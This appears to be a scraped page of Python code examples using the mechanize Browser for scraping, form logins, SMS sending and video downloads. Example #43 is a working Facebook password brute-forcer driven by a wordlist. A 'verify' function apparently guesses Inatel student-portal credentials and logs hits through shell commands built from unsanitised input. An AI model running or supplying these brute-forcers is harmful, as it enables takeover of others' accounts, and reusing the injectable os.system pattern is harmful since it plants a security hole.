     # does *NOT* work because of nasty javascript
     # probably need to use selenium
     from mechanize import Browser
     br = Browser()
     br.addheaders = [ ('User-agent', 'Firefox') ]
     br.set_handle_robots(False)
     br.open('http://mdgs.un.org/unsd/mdg/Metadata.aspx')
     br.follow_link(text='Flat View')
     assert br.viewing_html()
     out = br.response().read()
     # TODO: extract option list and then clean up
     return out
Example #40
def downloadAll(username, courseName):
    br = Browser()
    br.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9'
    )]
    br.set_handle_robots(False)
    br.open('https://myvideosu.stanford.edu/oce/currentquarter.aspx')
    assert br.viewing_html()
    br.select_form(name='login')
    br['username'] = username
    br['password'] = getpass()

    # Open the course page for the title you're looking for
    print 'Logging in to myvideosu.stanford.edu...'
    response = br.submit()
    print 'Logged in, going to course link.'
    response = br.follow_link(text=courseName)

    # Build up a list of lectures.

    print 'Loading video links.'
    links = []
    for link in br.links(text='WMP'):
        links.append(re.search(r"'(.*)'", link.url).group(1))

    # So we download the oldest ones first.
    links.reverse()

    print 'Found %d links, getting video streams.' % len(links)

    videos = []
    for link in links:
        response = br.open(link)
        soup = BeautifulSoup(response.read())
        video = soup.find('object', id='WMPlayer')['data']
        video = re.sub('http', 'mms', video)
        video = video.replace(' ', '%20')  # remove spaces, they break urls

        output_name = re.search(r'[a-z]+[0-9]+[a-z]?/[0-9]+',
                                video).group(0).replace('/', '_')
        output_wmv = output_name + '.wmv'

        print video
        videos.append((video, output_wmv))

    print 'Downloading %d video streams.' % (len(videos))
    for video in videos:
        download(video)

    print 'Done!'
Example #41
def DownloadPage(url, headers=None):
    if headers == None:
        headers = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    else:
        pass
        
    from mechanize import Browser, _http
    
    br = Browser()    
    br.set_handle_robots(False)
    br.addheaders = headers
    
    page = br.open(url)
    return page.read()
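A usage sketch relying on the default headers; the URL is only a placeholder.
# Hypothetical call with the built-in Firefox-style User-agent header.
html = DownloadPage('http://example.com')
print html[:100]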
Example #42
def login():
    br = Browser()

    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Chrome')]
    br.open("https://auth.tdameritrade.com")

    br.select_form(id="authform")
    br.form['su_username'] = "******"
    br.form['su_password'] = "******"

    no_url = br.submit()
    url = no_url.geturl()
    return url
Example #43
def clarisha():
	try:
		
		br = Browser() # Super Hidden Browser
		c = cookielib.LWPCookieJar() # Variable For CookiesJar 
		# Other Options Must Be Set 
		br.set_handle_robots(False)
		br.set_handle_equiv(True)
		br.set_handle_referer(True)
		br.set_handle_redirect(True)
		br.set_cookiejar(c) # Setting up cookies
		br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) # Refresh
		headers = [("User-agent",'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1' )] 
		br.addheaders = headers	# Setting up the User-Agent
		user_name = raw_input( 'Enter UserName / Email >> ')
		wordlist = raw_input('Enter Passwords List >> ')
		try:
			open(wordlist,'r')
		except IOError:
			octa()
			print(NGENTOT+'No Such File or Directory >> %s'%(wordlist)+ENDC)
			print('\n')
			clarisha()
		octa()
		wordlist = open(wordlist, 'r') # Opening Passwords List in Read Mode 
		for password in wordlist: # Taking Each Password on the List
			password = password.rstrip('\n')
			br.open('https://www.facebook.com/login.php') # Open Login Facebook URL
			# Setting some options ('HTML Options')
			br.select_form(nr=0)
			br.form['email'] = user_name
			br.form['pass'] = password
			br.submit()
			url = br.geturl()
			if url == 'https://www.facebook.com/login.php' or url == 'https://www.facebook.com/login.php?login_attempt=1&lwv=100':
				print(NGENTOT + 'Password Not Correct %s'%(password))
			elif url == 'https://www.facebook.com/' or url == 'https://www.facebook.com/?sk=welcome' or url == 'https://www.facebook.com/checkpoint/?next':
				print('\n')
				print('+------------------------------------------|')
				print(' | Password Found : %s'%(MUKIDI+password+ENDC) +  '|')
				print('+------------------------------------------|')
				print('\n')
				exit(0)

	except KeyboardInterrupt:
		time.sleep(1)
		octa()
		print(NGENTOT+'Exiting =)')
		print('\n')
		sys.exit(0)
def download():
  b=Browser()
  b.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

  r1=b.open(URL)

  b.select_form(nr=0)
  b.set_all_readonly(False)
  b["__EVENTTARGET"] = "ctl00$CPH1$dgMain"
  b["__EVENTARGUMENT"] = "Page$2"
  b.find_control("ctl00$CPH1$tbSearch").disabled=True

  r2=b.submit()

  return [r1,r2]
Example #45
def Top10Followers():
    ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-Agent', ua), ('Accept', '*/*')]
    br.open('http://socialblade.com/instagram/top/10/followers')
    soup = BeautifulSoup(br.response().read())
    table = soup.find('div', {'class':'content-module-wide'}).contents
    top10 = []
    for i in xrange(1, 120, 2):
        top10.append(table[i].text.replace(',', '.'))
    # Split the flat list into rows of six values and pick the columns we need.
    rows = [top10[x:x + 6] for x in xrange(0, len(top10), 6)]
    top10return = []
    for n in range(0, 10):
        top10return.append('%s | %s | %s | %s | %s\n' % (rows[n][0], rows[n][2], rows[n][3], rows[n][4], rows[n][5]))
    return ''.join(top10return)
Example #46
def init_browser():
    browser = Browser()
    browser.addheaders = (
        ('Accept',
         'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
        ('User-agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
         )  # We're Firefox! :P
    )
    # browser.set_handle_gzip(True) # Currently experimental in mechanize
    browser.set_handle_redirect(True)
    browser.set_handle_refresh(False)
    browser.set_handle_robots(True)
    browser.set_handled_schemes(['http', 'https'])
    browser.set_proxies({})
    return browser
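A hypothetical usage of the factory above; the URL is a placeholder.
# Illustrative usage; note that this browser is configured to honour robots.txt.
browser = init_browser()
page = browser.open('http://example.com')
print page.read()[:200]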
Example #47
    def redirect(self):
        try:
            if self.agent == True:
                br = Browser()
                UserAgent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
                header = {"User-Agent": UserAgent}
                br.set_handle_robots(False)
                br.addheaders = [("User-agent", "Fifefox")]

                remote_url = br.open(self.target).geturl()
            else:
                remote_url = u.urlopen(self.target).geturl()
            return (remote_url)
        except Exception as e:
            print(e)
Example #48
    def get_browser(browser=None):
        """ Create new browser if none is present.

        Returns:
            (:class:`mechanize.Browser`)
        """
        if not browser:
            browser = Browser()
            browser.set_handle_robots(False)
            browser.addheaders = [('User-agent',
                                   ('Mozilla/5.0 (X11; U; Linux i686; en-US; '
                                    'rv:1.9.0.1) Gecko/2008071615 '
                                    'Fedora/3.0.1-1.fc9 Firefox/3.0.1'))]

        return browser
Example #49
    def HTTPcode(self):
        try:
            if self.agent == True:
                br = Browser()
                UserAgent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
                header = {"User-Agent": UserAgent}
                br.set_handle_robots(False)
                br.addheaders = [("User-agent", "Fifefox")]

                resp = br.open(self.target).code
            else:
                resp = u.urlopen(self.target).getcode()
            return (resp)
        except (u.HTTPError, u.URLError):
            return (404)
Example #50
def getdata(url):

    br = Browser()

    # Ignore robots.txt
    br.set_handle_robots(False)
    # Google demands a user-agent that isn't a robot
    br.addheaders = [('User-agent', 'Firefox')]

    # Retrieve the requested page, saving the response
    br.open(url)

    res = br.response()
    data = res.get_data()

    return data
Example #51
def download(url):
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
    )]
    br.open("https://translate.google.com/translate?hl=&sl=&tl=&u=" + url +
            "&anno=2")
    for link in br.links():
        if "https://translate.googleusercontent.com/translate_p?" in link.absolute_url:
            br.follow_link(link)
            break
    response = BeautifulSoup(br.response().read().decode(),
                             "html.parser").find("pre").get_text()
    return response
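A hedged usage sketch; the page below is only a placeholder.
# Hypothetical call: fetch the Google-translated text of an arbitrary page.
print download('http://example.com')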
Example #52
def setupUSCIS(immInfo):
    br = Browser()
    br.addheaders = [('User-Agent', "Mozilla/5.0 \
    (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko)\
     Chrome/79.0.3945.130 Safari/537.36")]

    # opens to the sign up page
    br.open('https://egov.uscis.gov/casestatus/disclaimer.do')
    br.follow_link(text="ACCEPT")

    # clicks next (nothing on page 1)
    br.select_form("signUpForm")
    br.submit()

    #fills in the signup sheet
    br.select_form("signUpForm")
    br.form["userSubType"] = ["1"]
    br.form["firstName"] = immInfo["firstName"]
    br.form["lastName"] = immInfo["lastName"]
    br.form["country"] = immInfo["country"]
    br.form["city"] = immInfo["city"]
    br.form["state"] = immInfo["state"]
    br.form["zipCode"] = immInfo["zipCode"]
    br.form["email"] = immInfo["email"]
    br.form["phone"] = immInfo["phone"]
    br.form["language"] = immInfo["language"]
    br.submit()

    #generates random username and password
    br.select_form("signUpForm")
    br.form["userId"] = immInfo["username"]
    br.form["password"] = immInfo["password"]
    br.form["confirmPassword"] = immInfo["password"]

    #counts each question answered
    counter = 1
    for i in range(1, 13):
        if counter == 5:
            break
        #checks if the answer exists
        if immInfo["answer" + str(i)]:
            br.form["question" + str(counter)] = str(i)
            br.form["answer" + str(counter)] = immInfo["answer" + str(i)]
            counter += 1

    #submits form
    br.submit()
def verify(th, num, curso, matr, senha):
    URL = "https://siteseguro.inatel.br/PortalAcademico/WebLogin.aspx"

    br = Browser()
    br.set_handle_robots(False)
    br.open(URL)

    br.select_form('aspnetForm')
    br.addheaders = [('User-agent',
                      'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) '
                      'Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$tbMatricula'] = matr
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$Password'] = senha
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$dropSubCurso'] = [curso]

    response = br.submit(name='ctl00$Corpo$TabAcessoLogin'
                              '$TabAluno$LogOn$LoginButton')

    dados = response.read()

    soup = BeautifulSoup(dados, 'html.parser')

    try:
        label_erro = soup.find(id='ctl00_Corpo_lblErro')
        label_login = soup.find(id='ctl00_LoginName1')

        if label_erro is not None:
            label_erro_str = label_erro.get_text().encode('ascii', 'ignore')

        if label_login is not None:
            os.system("echo 'Curso: %s; Matr: %s; Senha: %s' "
                      ">> senha.log" % (curso, matr, senha))
            return True

        elif label_erro_str == ('Sua senha est bloqueada. Entre '
                                'em contato com a CRA para providenciar '
                                'o desbloqueio ou aguarde 30 minutos.'):
            os.system("echo 'Curso: %s; Matr: %s; Senha: %s' "
                      ">> bloqueado.log" % (curso, matr, senha))
            return False

        else:
            print('Thread: %i ==> Curso: %s; Matr: %s; Senha: %s; NOK' % (num, curso, matr, senha))

    except:
        print("Erro na biblioteca, verifique as dependencias!")
Example #54
 def process_irc(self, ident, _from, to, msg):
     """
     Handle IRC messages
     """
     # Process URLs posting
     for url in self.xurls(msg):
         if re.match("^(http|https)://(www\.|)youtube.com.*", url):
             self.process_irc_youtube(url)
             continue
         try:
             br = Browser()
             br.set_handle_robots(False)
             br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0')]
             br.open(url)
             self.irc.privmsg(self.channel, "Title: " + br.title())
         except Exception, e:
             self.debug.error("process_irc: Exception '%s'." % e)
Example #55
def send_sms_voda(user, pword, number, txt):
    if user[0] == '0':
        user = '******' + user[1:]

    br = Browser()

    # Set user-agent
    headers = dict(br.addheaders)
    headers[
        "User-agent"] = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008052912 Firefox/3.0"
    br.addheaders = headers.items()

    # Login
    br.open(LOGIN_URL)
    br.select_form(nr=1)
    br["logon"] = user
    br["password"] = pword
    print "Logging in..."
    br.submit()

    # Send SMS
    br.open(SMS_URL)
    br.select_form(nr=1)
    br["destinationNumber"] = number
    br["messageBody"] = txt

    # Thanks for using shitty code Vodacom. We have to extract the submission
    # url from the javascript code in the document.
    page = br.response().read()
    x = page.find('function validateFormInput()')
    x = page.find('var actionURL', x)
    actionURLStart = page.find("'", x) + 1
    actionURLEnd = page.find("'", actionURLStart)
    actionURL = page[actionURLStart:actionURLEnd]
    br.form.action = 'https://www.vodacom.co.za' + actionURL

    print "Sending message..."
    br.submit()

    response = br.response().read()
    if 'Your SMS has been delivered successfully.' in response:
        print "Message sent"
    else:
        print >> stderr, "Message sending failed. See /tmp/vodacom.html to see the response."
        file('/tmp/vodacom.html', 'w').write(response)
        exit(1)
Example #56
def doLogin():
    global br 
    br = Browser()
    br.set_handle_robots(False)
    br.set_handle_refresh(False)
    br.addheaders = [('User-agent', 'Firefox')]
    br.open("https://www.qruiser.com")
    #response1 = br.follow_link(link)
    i = 0
    for form in br.forms():
        i += 1
        #print form
        if i > 1:
            br.form = form
    br.form['loginname'] = 'maxberggren'
    br.form['loginpassword'] = '******'
    response = br.submit()  
Example #57
def get_horario(matr, senha, curso):

    URL = "https://siteseguro.inatel.br/PortalAcademico/Academico/Sra/WebQuadroAulas.aspx"

    br = Browser()
    br.set_handle_robots(False)
    br.open(URL)

    br.set_handle_robots(False)

    br.select_form('aspnetForm')
    br.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
    )]

    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$tbMatricula'] = matr
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$Password'] = senha
    br.form['ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$dropSubCurso'] = [curso]

    response = br.submit(
        name='ctl00$Corpo$TabAcessoLogin$TabAluno$LogOn$LoginButton')

    dados = response.read()

    soup = BeautifulSoup(dados, 'html.parser')

    soup2 = soup.find(id='ctl00_Corpo_UCQuadroHorarios1_GridDados')
    all_td = soup2.find_all("td")
    aux = []

    for var in all_td:
        aux.append(var.get_text())

    lista_horario = []

    for x in range(0, 15):
        lista_horario.append(aux[2 + (19 * x)])
        lista_horario.append(aux[5 + (19 * x)])
        lista_horario.append(aux[8 + (19 * x)])
        lista_horario.append(aux[11 + (19 * x)])
        lista_horario.append(aux[14 + (19 * x)])
        lista_horario.append(aux[17 + (19 * x)])

    return lista_horario
def submit_form(response):
    browser = Browser()
    browser.set_handle_robots(False)
    browser.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    browser.open(response.url)
    browser.select_form(nr = 0)
    browser.form['username'] = USERNAME
    browser.form['password'] = PASSWORD
    browser.submit() 

    url_principal = browser.geturl()
    browser.open(url_principal)
    browser.select_form(nr = 0)
    print browser.response().read()
    browser.submit() 

    return browser 
def crawler():
    global url
    global total_news
    agent = Browser()
    agent.addheaders = [('User-agent', 'Firefox')]
    agent.set_handle_robots(True)
    agent.set_handle_refresh(False)

    agent_data = agent.open(url)
    soup = BS(agent_data.read(), "lxml")

    for row in soup.find_all(
            'div', attrs={"class": "list-view--item vertical-list-item"}):
        link = row.find('a')['href']
        date = row.find('span', attrs={"class": "timestamp"}).text
        text = row.find('p', attrs={"class": "heading text-underline"}).text
        if {"date": date, "news": text, "link": link} not in total_news:
            total_news.append({"date": date, "news": text, "link": link})
def SHOW(url):
    from mechanize import Browser
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Firefox')]
    br.open(url)
    response = br.open(url)
    data = response.read()
    response.close()
    cr = 0
    match = re.compile(
        '<span class="bold">(.+?)</span>.*\n.*src="(.+?)"').findall(data)
    #matchi = re.compile('<link rel="image_src" href="(.+?)"').findall(data)
    for server, link in match:
        #for thumbnail in match:
        title = 'Server-' + server + name
        addLink2(name, link, 10, iconimage, title)
        cr = cr + 1